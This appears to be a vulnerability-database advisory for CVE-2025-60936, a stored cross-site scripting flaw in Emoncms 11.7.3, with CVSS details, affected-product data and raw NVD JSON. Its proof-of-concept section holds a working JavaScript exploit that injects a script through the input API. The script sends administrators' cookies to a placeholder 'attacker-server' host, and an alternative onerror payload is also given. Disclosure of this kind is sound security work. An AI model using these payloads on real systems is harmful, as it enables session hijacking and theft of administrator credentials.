Security Vulnerability Report
CVE-2025-60936 CVSS 6.1 MEDIUM

Published: 2025-10-24 15:15:40
Last Modified: 2025-10-28 02:32:52

Description

Emoncms 11.7.3 is vulnerable to Cross-Site Scripting (XSS) in the input handling mechanism. This vulnerability allows authenticated attackers with API access to inject malicious JavaScript code that executes when administrators view the application logs.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openenergymonitor:emoncms:11.7.3:*:*:*:*:*:*:* - VULNERABLE
Emoncms < 11.7.4
Emoncms 11.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-60936 XSS PoC for Emoncms 11.7.3
// Requires authenticated API access
const apiUrl = 'http://target-host/emoncms/input/post.json';
const apiKey = 'YOUR_API_KEY'; // Attacker needs valid API key

// Malicious payload - stored XSS in input handling
const maliciousPayload = '<script>\n' +
    ' fetch("http://attacker-server/steal?cookie=" + encodeURIComponent(document.cookie))\n' +
    '</script>';

// Send malicious input via API
const data = {
    node: 1,
    name: maliciousPayload,
    data: 'test_value'
};

fetch(apiUrl, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + apiKey
    },
    body: JSON.stringify(data)
})
    .then(response => response.json())
    .then(result => console.log('XSS payload injected:', result))
    .catch(error => console.error('Error:', error));

// Alternative simpler payload for testing:
// "><img src=x onerror=alert(document.domain)>

References

https://github.com/emoncms/emoncms/issues/1940 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60936", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:40.440", "lastModified": "2025-10-28T02:32:52.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emoncms 11.7.3 is vulnerable to Cross Site in the input handling mechanism. This vulnerability allows authenticated attackers with API access to inject malicious JavaScript code that executes when administrators view the application logs."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openenergymonitor:emoncms:11.7.3:*:*:*:*:*:*:*", "matchCriteriaId": "3C09BE6B-BA9D-42F3-A496-76F32FFE9E07"}]}]}], "references": [{"url": "https://github.com/emoncms/emoncms/issues/1940", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}